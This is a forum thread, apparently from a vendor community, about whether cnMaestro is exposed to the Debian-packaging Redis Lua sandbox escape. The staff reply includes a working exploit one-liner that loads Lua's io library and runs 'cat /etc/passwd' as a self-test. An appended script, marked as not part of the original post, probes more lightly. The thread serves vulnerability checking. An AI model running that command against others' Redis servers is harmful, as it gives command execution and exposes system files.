cnMaestro - redis vulnerability?

Is cnMaestro vulnerable to this redis vulnerability?

Hi @rnelson - thanks for checking.

We don't believe cnMaestro is impacted by this. We use Redis in cnMaestro, but not the Debian/Ubuntu packages which are susceptible to this vulnerability. The vulnerability is actually more of a packaging issue than a bug in Redis, and comes from leaving some global Lua variables available on initialisation.

To test on your setup (You’ll need redis-cli installed. You could also use any redis library for your language of choice):

redis-cli eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd"); local res = f:read("*a"); f:close(); return res' 0

You should get an error from this (and you’ll notice on cnMaestro onprem you do). If this returns the contents of your passwd file, you’ll want to upgrade Redis as soon as possible.

Reginaldo Silva, who discovered the bug, has a really good writeup about it here: An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives

We’ll post more if we find any new info.

2 Likes
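A lighter variant of the check in the reply above, as an added example that is not part of the original post or cnMaestro's own tooling: it only asks the Lua sandbox for the type of the `package` global that the posted command depends on, then classifies the reply. The function names, the `--check` argument and the sample replies in the comments are assumptions made for this example, as is the expectation that an unaffected build answers with an error or `nil`.

```shell
#!/bin/sh
# Added example: report whether the Redis Lua sandbox still exposes the
# `package` global that the command in the post relies on.

# Probe script: returns a type name only; it loads no library and runs nothing.
PROBE='return type(package)'

# classify_reply REPLY -> prints one of: exposed | blocked | unknown
#   exposed : `package` is a live table inside the sandbox
#   blocked : Redis refused the access, or the global is nil
#   unknown : anything else (connection failure, redis-cli missing, ...)
classify_reply() {
    case "$1" in
        table|'"table"')  echo exposed ;;   # raw and TTY redis-cli formats
        nil|'"nil"')      echo blocked ;;
        *ERR*|'(error)'*) echo blocked ;;   # e.g. "nonexistent global variable"
        *)                echo unknown ;;
    esac
}

# check_redis HOST PORT -> prints "HOST:PORT verdict"; returns 1 if exposed.
check_redis() {
    reply=$(redis-cli -h "$1" -p "$2" eval "$PROBE" 0 2>&1)
    verdict=$(classify_reply "$reply")
    echo "$1:$2 $verdict"
    [ "$verdict" != exposed ]
}

# Only contacts a server when asked to: ./check.sh --check [host] [port]
if [ "${1:-}" = "--check" ]; then
    check_redis "${2:-127.0.0.1}" "${3:-6379}"
fi
```

An `unknown` verdict means the probe never reached the script engine, so it says nothing about the server either way.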